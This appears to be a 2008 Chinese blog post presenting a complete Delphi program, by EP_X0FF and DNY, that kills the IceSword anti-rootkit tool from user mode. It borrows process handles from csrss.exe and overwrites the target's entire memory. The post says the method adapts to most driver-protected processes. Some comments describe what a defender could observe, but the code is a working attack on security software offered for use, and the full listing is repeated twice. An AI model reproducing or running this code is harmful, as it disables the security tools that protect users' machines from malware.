Ring3下干掉IceSword
[ 2008-6-24 23:27:00 | By: hhack ]
//{$DEFINE minimum}
{$E exe}
{$IMAGEBASE $00400000}
{$R-}
{$Q-}
{$IFDEF minimum}
program Icie1;
{$ENDIF}
{$IFNDEF minimum}
unit Icie1;
interface
implementation
{$ENDIF}
uses
Windows, WinBase,
RTL,
WinNative;
// Strings, globals and the one record type the demo uses.
const
// Caption text that enum2 looks for (compared after spaces are stripped).
// This string is the only thing the demo uses to recognise the target window.
mymsg: PWideChar = 'Author:pjf(ustc)';
// Title shared by every MessageBoxW in this file.
Icie: PWideChar = 'Icie!';
var
// Global scratch buffer for window captions. FuckIcie declares a local of
// the same name (a PSYSINFOBUF) that shadows this one inside that routine.
buf: LBuf;
// Set by enum2 once a matching window has been found; read by the main block.
icie_f: boolean = false;
type
// Layout assumed for the SystemHandleInformation query result: a count
// followed by a variable-length table of entries. FuckIcie indexes the
// [0..0] array well past its declared bound, which only compiles because
// range checking is switched off at the top of the file ({$R-}).
_SYSINFOBUF = record
uHandleCount: ULONG;
rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION;
end;
SYSINFOBUF = _SYSINFOBUF;
PSYSINFOBUF = ^_SYSINFOBUF;
// Demo routine from the post. dwProcessId is the PID that enum2 resolved
// from the matching window. The routine never opens that PID directly: it
// opens csrss.exe, walks the system handle table for handles csrss holds,
// duplicates each candidate into this process to learn which PID it refers
// to, and then sweeps the matching process's user address space, making
// every page RWX and overwriting it with junk.
// Seen from the defender's side the sequence is: SeDebugPrivilege enabled
// (main block), PROCESS_ALL_ACCESS open of csrss.exe by a non-system
// process, ZwDuplicateObject out of csrss, then a cross-process
// ZwProtectVirtualMemory/ZwWriteVirtualMemory sweep over 0x10000..0x7FFFFFFF.
// Each of those is a cross-process action that a monitor or kernel driver
// can observe or refuse; none of them is hidden by the "Ring3" framing.
// Parameters:
//   dwProcessId - PID of the process whose memory is to be wiped.
// Returns nothing. Apart from the ZwDuplicateObject and
// ZwProtectVirtualMemory checks, every native status code is ignored.
procedure FuckIcie(dwProcessId: DWORD);
var
h_dup, ph: THANDLE;
bytesIO: ULONG;
// Shadows the global LBuf buf; here it points at the handle-information buffer.
buf: PSYSINFOBUF;
c: integer;
cid1: CLIENT_ID;
attr: OBJECT_ATTRIBUTES;
// PID of csrss.exe (0 when not found). Declared as a handle type but holds a PID.
csrss_id: THANDLE;
tmp1: LBuf;
pBuffer: PROCESSENTRY32W;
SnapShotHandle: THANDLE;
pbi: PROCESS_BASIC_INFORMATION;
// p0 is the sweep cursor; p1 is a copy passed to ZwProtectVirtualMemory,
// which may adjust the base address it is given in place.
p0, p1: PChar;
// sz is the region size for the protect call; oldp doubles as the
// old-protection output and as the bytes-written output of the write call.
sz, oldp: ULONG;
begin
// 1. Locate csrss.exe by executable name through a toolhelp snapshot.
csrss_id := 0;
pBuffer.dwSize := sizeof(PROCESSENTRY32W);
SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
if Process32FirstW(SnapShotHandle, @pBuffer) then
repeat
ExtractFileNameW(pBuffer.szExeFile, tmp1);
if (strcmpiW(tmp1, 'csrss.exe') = 0) then
begin
// First match wins; any further csrss instances are ignored.
csrss_id := pBuffer.th32ProcessID;
break;
end;
until (not Process32NextW(SnapShotHandle, @pBuffer));
// Called even when the snapshot failed (SnapShotHandle = INVALID_HANDLE_VALUE).
CloseHandle(SnapShotHandle);
if (csrss_id <> 0) then MessageBoxW(0, 'backdoor friendly process located', Icie, MB_OK);
// 2. Open csrss with full access. There is no csrss_id = 0 guard and the
// status is not tested, so on failure ph is left uninitialised and is
// still passed to ZwDuplicateObject and ZwClose below.
attr.Length := sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory := 0;
attr.ObjectName := nil;
attr.Attributes := 0;
attr.SecurityDescriptor := nil;
attr.SecurityQualityOfService := nil;
cid1.UniqueProcess := csrss_id;
cid1.UniqueThread := 0;
ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1);
// 3. Snapshot the system handle table into a fixed 4 MiB buffer. Neither
// the allocation nor the query status is checked: if the allocation fails
// buf stays nil and is dereferenced below; if the table does not fit there
// is no STATUS_INFO_LENGTH_MISMATCH retry and uHandleCount is trusted as-is.
bytesIO := 4194304;
buf := nil;
ZwAllocateVirtualMemory(GetCurrentProcess(), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
// 4. For every handle owned by csrss whose object type index is 5
// (presumably the process object type on the author's Windows build — the
// index is not stable across versions, TODO confirm), duplicate it into
// this process (DWORD(-1) is the current-process pseudo-handle) and read
// the PID it refers to.
for c := 0 to buf^.uHandleCount - 1 do
if (buf^.rHandleTable[c].ProcessId = csrss_id) then
begin
if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then
begin
if (ZwDuplicateObject(ph, buf^.rHandleTable[c].Handle, DWORD(-1), @h_dup,
0, 0, DUPLICATE_SAME_ACCESS) = STATUS_SUCCESS) then
begin
// Status is not checked; pbi may be stale if the query fails.
ZwQueryInformationProcess(h_dup, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO);
if (pbi.UniqueProcessId = dwProcessId) then
begin
MessageBoxW(0, 'In a process... Press "Ok" and please wait few seconds, after it IceSword will be destroyed =)))))', Icie, MB_OK);
// 5. Sweep 0x10000..0x7FFFFFFF in 4 KiB steps (a 32-bit user-space
// layout is assumed): make the page RWX, then overwrite it with the
// first 0x1000 bytes of the handle buffer. Only the protect status is
// checked; write failures are ignored. The post claims this leaves the
// target unable to run.
p0 := pointer($10000);
repeat
p1 := p0;
sz := $1000;
if (ZwProtectVirtualMemory(h_dup, @p1, @sz, PAGE_EXECUTE_READWRITE, @oldp) = STATUS_SUCCESS) then
ZwWriteVirtualMemory(h_dup, p0, buf, $1000, @oldp);
p0 := p0 + $1000;
until (DWORD(p0) >= $80000000);
MessageBoxW(0, 'Icie is now f***d and unworkable =) l ol', Icie, 0);
end;
// The duplicated handle is closed whether or not it matched.
ZwClose(h_dup);
end;
end;
end;
// 6. Release the csrss handle and the 4 MiB buffer.
ZwClose(ph);
bytesIO := 0;
ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE);
end;
// EnumChildWindows callback. Reads the window's caption, strips spaces and
// compares the result with mymsg; on a match sets icie_f, resolves the
// owning PID and hands it to FuckIcie. lParam is unused. Always returns
// true, so enumeration continues even after a hit.
function enum2(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
var
pid: Cardinal;
buf1: LBuf;
i, k: integer;
begin
result := true;
memzero(@buf, sizeof(LBuf));
memzero(@buf1, sizeof(LBuf));
// The caption lands in the global buf (at most MAX_PATH characters).
GetWindowTextW(_hwnd, @buf, MAX_PATH);
k := 0;
// Copy non-space characters into buf1. The loop runs to strlenW(buf)
// inclusive, so the terminator is visited too (buf1 is zeroed anyway).
// NOTE(review): as reproduced on this page the comparison and the copy
// use the whole array `buf` rather than an element; the `[i]` index looks
// to have been lost when the page was extracted — confirm against the
// downloadable source before reading anything into it.
for i := 0 to strlenW(buf) do
if buf <> ' ' then
begin
buf1[k] := buf;
inc(k);
end;
// Recognition is by caption text alone (case-insensitive compare).
if (strcmpiW(mymsg, @buf1) = 0) then
begin
MessageBoxW(0, 'Icie found, let''s f*** it!', Icie, 0);
icie_f := true;
GetWindowThreadProcessId(_hwnd, @pid);
FuckIcie(pid);
end;
end;
// EnumWindows callback. For each top-level window, walks its child windows
// with enum2 (the caption being searched for sits on a child control, not
// on the top-level frame — inferred from this structure). lParam is unused.
// Always returns true so EnumWindows keeps going.
function enum1(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
begin
result := true;
EnumChildWindows(_hwnd, @enum2, 0);
end;
// Entry point of the window scan: enumerates every top-level window via
// enum1, which descends into children with enum2. The result is reported
// only through the global icie_f, which enum2 sets on a match.
procedure DetectIcie();
begin
EnumWindows(@enum1, 0);
end;
// Program body. First enables SeDebugPrivilege for this process (prev
// receives the previous enable state; it is declared integer although the
// API writes a single BOOLEAN — TODO confirm against the WinNative
// declaration). Enablement only succeeds when the token already holds the
// privilege, i.e. an administrative token; without it the demo exits here.
// From a detection standpoint this privilege enablement by an unsigned
// user-mode tool is the first observable event of the whole sequence.
// Then shows the banner, runs the window scan, and reports when nothing
// matched.
var
prev: integer;
begin
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then
begin
MessageBoxW(0, 'Cannot get more privilegies', Icie, MB_OK);
ExitProcess(0);
end;
MessageBoxW(0, 'This simple app demonstrates how to destroy untouchable IceSword (any english version) from poor User Mode'#13#13#10 +
'Inline Hooks will not help Icie!'#13#10'Demo by EP_X0FF and DNY', Icie, 0);
DetectIcie();
// icie_f is only ever set by enum2.
if not icie_f then MessageBoxW(0, 'Start Icie English version first! =)))', Icie, MB_OK);
end.
适用于英文版,只需改一下即可用于任何版本及多数受驱动保护的进程。
这个 Demo 的作者是EP_X0FF 和 DNY,也就是RkUnHooker的作者。
这大概是 RkU 使用的强制杀进程方法——所谓的虚拟内存擦除技术——的 Ring3 版本吧~
{$E exe}
{$IMAGEBASE $00400000}
{$R-}
{$Q-}
{$IFDEF minimum}
program Icie1;
{$ENDIF}
{$IFNDEF minimum}
unit Icie1;
interface
implementation
{$ENDIF}
uses
Windows, WinBase,
RTL,
WinNative;
// Strings, globals and the one record type the demo uses.
const
// Caption text that enum2 looks for (compared after spaces are stripped).
// This string is the only thing the demo uses to recognise the target window.
mymsg: PWideChar = 'Author:pjf(ustc)';
// Title shared by every MessageBoxW in this file.
Icie: PWideChar = 'Icie!';
var
// Global scratch buffer for window captions. FuckIcie declares a local of
// the same name (a PSYSINFOBUF) that shadows this one inside that routine.
buf: LBuf;
// Set by enum2 once a matching window has been found; read by the main block.
icie_f: boolean = false;
type
// Layout assumed for the SystemHandleInformation query result: a count
// followed by a variable-length table of entries. FuckIcie indexes the
// [0..0] array well past its declared bound, which only compiles because
// range checking is switched off at the top of the file ({$R-}).
_SYSINFOBUF = record
uHandleCount: ULONG;
rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION;
end;
SYSINFOBUF = _SYSINFOBUF;
PSYSINFOBUF = ^_SYSINFOBUF;
// Demo routine from the post. dwProcessId is the PID that enum2 resolved
// from the matching window. The routine never opens that PID directly: it
// opens csrss.exe, walks the system handle table for handles csrss holds,
// duplicates each candidate into this process to learn which PID it refers
// to, and then sweeps the matching process's user address space, making
// every page RWX and overwriting it with junk.
// Seen from the defender's side the sequence is: SeDebugPrivilege enabled
// (main block), PROCESS_ALL_ACCESS open of csrss.exe by a non-system
// process, ZwDuplicateObject out of csrss, then a cross-process
// ZwProtectVirtualMemory/ZwWriteVirtualMemory sweep over 0x10000..0x7FFFFFFF.
// Each of those is a cross-process action that a monitor or kernel driver
// can observe or refuse; none of them is hidden by the "Ring3" framing.
// Parameters:
//   dwProcessId - PID of the process whose memory is to be wiped.
// Returns nothing. Apart from the ZwDuplicateObject and
// ZwProtectVirtualMemory checks, every native status code is ignored.
procedure FuckIcie(dwProcessId: DWORD);
var
h_dup, ph: THANDLE;
bytesIO: ULONG;
// Shadows the global LBuf buf; here it points at the handle-information buffer.
buf: PSYSINFOBUF;
c: integer;
cid1: CLIENT_ID;
attr: OBJECT_ATTRIBUTES;
// PID of csrss.exe (0 when not found). Declared as a handle type but holds a PID.
csrss_id: THANDLE;
tmp1: LBuf;
pBuffer: PROCESSENTRY32W;
SnapShotHandle: THANDLE;
pbi: PROCESS_BASIC_INFORMATION;
// p0 is the sweep cursor; p1 is a copy passed to ZwProtectVirtualMemory,
// which may adjust the base address it is given in place.
p0, p1: PChar;
// sz is the region size for the protect call; oldp doubles as the
// old-protection output and as the bytes-written output of the write call.
sz, oldp: ULONG;
begin
// 1. Locate csrss.exe by executable name through a toolhelp snapshot.
csrss_id := 0;
pBuffer.dwSize := sizeof(PROCESSENTRY32W);
SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
if Process32FirstW(SnapShotHandle, @pBuffer) then
repeat
ExtractFileNameW(pBuffer.szExeFile, tmp1);
if (strcmpiW(tmp1, 'csrss.exe') = 0) then
begin
// First match wins; any further csrss instances are ignored.
csrss_id := pBuffer.th32ProcessID;
break;
end;
until (not Process32NextW(SnapShotHandle, @pBuffer));
// Called even when the snapshot failed (SnapShotHandle = INVALID_HANDLE_VALUE).
CloseHandle(SnapShotHandle);
if (csrss_id <> 0) then MessageBoxW(0, 'backdoor friendly process located', Icie, MB_OK);
// 2. Open csrss with full access. There is no csrss_id = 0 guard and the
// status is not tested, so on failure ph is left uninitialised and is
// still passed to ZwDuplicateObject and ZwClose below.
attr.Length := sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory := 0;
attr.ObjectName := nil;
attr.Attributes := 0;
attr.SecurityDescriptor := nil;
attr.SecurityQualityOfService := nil;
cid1.UniqueProcess := csrss_id;
cid1.UniqueThread := 0;
ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1);
// 3. Snapshot the system handle table into a fixed 4 MiB buffer. Neither
// the allocation nor the query status is checked: if the allocation fails
// buf stays nil and is dereferenced below; if the table does not fit there
// is no STATUS_INFO_LENGTH_MISMATCH retry and uHandleCount is trusted as-is.
bytesIO := 4194304;
buf := nil;
ZwAllocateVirtualMemory(GetCurrentProcess(), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
// 4. For every handle owned by csrss whose object type index is 5
// (presumably the process object type on the author's Windows build — the
// index is not stable across versions, TODO confirm), duplicate it into
// this process (DWORD(-1) is the current-process pseudo-handle) and read
// the PID it refers to.
for c := 0 to buf^.uHandleCount - 1 do
if (buf^.rHandleTable[c].ProcessId = csrss_id) then
begin
if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then
begin
if (ZwDuplicateObject(ph, buf^.rHandleTable[c].Handle, DWORD(-1), @h_dup,
0, 0, DUPLICATE_SAME_ACCESS) = STATUS_SUCCESS) then
begin
// Status is not checked; pbi may be stale if the query fails.
ZwQueryInformationProcess(h_dup, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO);
if (pbi.UniqueProcessId = dwProcessId) then
begin
MessageBoxW(0, 'In a process... Press "Ok" and please wait few seconds, after it IceSword will be destroyed =)))))', Icie, MB_OK);
// 5. Sweep 0x10000..0x7FFFFFFF in 4 KiB steps (a 32-bit user-space
// layout is assumed): make the page RWX, then overwrite it with the
// first 0x1000 bytes of the handle buffer. Only the protect status is
// checked; write failures are ignored. The post claims this leaves the
// target unable to run.
p0 := pointer($10000);
repeat
p1 := p0;
sz := $1000;
if (ZwProtectVirtualMemory(h_dup, @p1, @sz, PAGE_EXECUTE_READWRITE, @oldp) = STATUS_SUCCESS) then
ZwWriteVirtualMemory(h_dup, p0, buf, $1000, @oldp);
p0 := p0 + $1000;
until (DWORD(p0) >= $80000000);
MessageBoxW(0, 'Icie is now f***d and unworkable =) l ol', Icie, 0);
end;
// The duplicated handle is closed whether or not it matched.
ZwClose(h_dup);
end;
end;
end;
// 6. Release the csrss handle and the 4 MiB buffer.
ZwClose(ph);
bytesIO := 0;
ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE);
end;
// EnumChildWindows callback. Reads the window's caption, strips spaces and
// compares the result with mymsg; on a match sets icie_f, resolves the
// owning PID and hands it to FuckIcie. lParam is unused. Always returns
// true, so enumeration continues even after a hit.
function enum2(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
var
pid: Cardinal;
buf1: LBuf;
i, k: integer;
begin
result := true;
memzero(@buf, sizeof(LBuf));
memzero(@buf1, sizeof(LBuf));
// The caption lands in the global buf (at most MAX_PATH characters).
GetWindowTextW(_hwnd, @buf, MAX_PATH);
k := 0;
// Copy non-space characters into buf1. The loop runs to strlenW(buf)
// inclusive, so the terminator is visited too (buf1 is zeroed anyway).
// NOTE(review): as reproduced on this page the comparison and the copy
// use the whole array `buf` rather than an element; the `[i]` index looks
// to have been lost when the page was extracted — confirm against the
// downloadable source before reading anything into it.
for i := 0 to strlenW(buf) do
if buf <> ' ' then
begin
buf1[k] := buf;
inc(k);
end;
// Recognition is by caption text alone (case-insensitive compare).
if (strcmpiW(mymsg, @buf1) = 0) then
begin
MessageBoxW(0, 'Icie found, let''s f*** it!', Icie, 0);
icie_f := true;
GetWindowThreadProcessId(_hwnd, @pid);
FuckIcie(pid);
end;
end;
// EnumWindows callback. For each top-level window, walks its child windows
// with enum2 (the caption being searched for sits on a child control, not
// on the top-level frame — inferred from this structure). lParam is unused.
// Always returns true so EnumWindows keeps going.
function enum1(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
begin
result := true;
EnumChildWindows(_hwnd, @enum2, 0);
end;
// Entry point of the window scan: enumerates every top-level window via
// enum1, which descends into children with enum2. The result is reported
// only through the global icie_f, which enum2 sets on a match.
procedure DetectIcie();
begin
EnumWindows(@enum1, 0);
end;
// Program body. First enables SeDebugPrivilege for this process (prev
// receives the previous enable state; it is declared integer although the
// API writes a single BOOLEAN — TODO confirm against the WinNative
// declaration). Enablement only succeeds when the token already holds the
// privilege, i.e. an administrative token; without it the demo exits here.
// From a detection standpoint this privilege enablement by an unsigned
// user-mode tool is the first observable event of the whole sequence.
// Then shows the banner, runs the window scan, and reports when nothing
// matched.
var
prev: integer;
begin
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then
begin
MessageBoxW(0, 'Cannot get more privilegies', Icie, MB_OK);
ExitProcess(0);
end;
MessageBoxW(0, 'This simple app demonstrates how to destroy untouchable IceSword (any english version) from poor User Mode'#13#13#10 +
'Inline Hooks will not help Icie!'#13#10'Demo by EP_X0FF and DNY', Icie, 0);
DetectIcie();
// icie_f is only ever set by enum2.
if not icie_f then MessageBoxW(0, 'Start Icie English version first! =)))', Icie, MB_OK);
end.
适用于英文版,只需改一下即可用于任何版本及多数受驱动保护的进程。
这个 Demo 的作者是EP_X0FF 和 DNY,也就是RkUnHooker的作者。
这大概是 RkU 使用的强制杀进程方法——所谓的虚拟内存擦除技术——的 Ring3 版本吧~



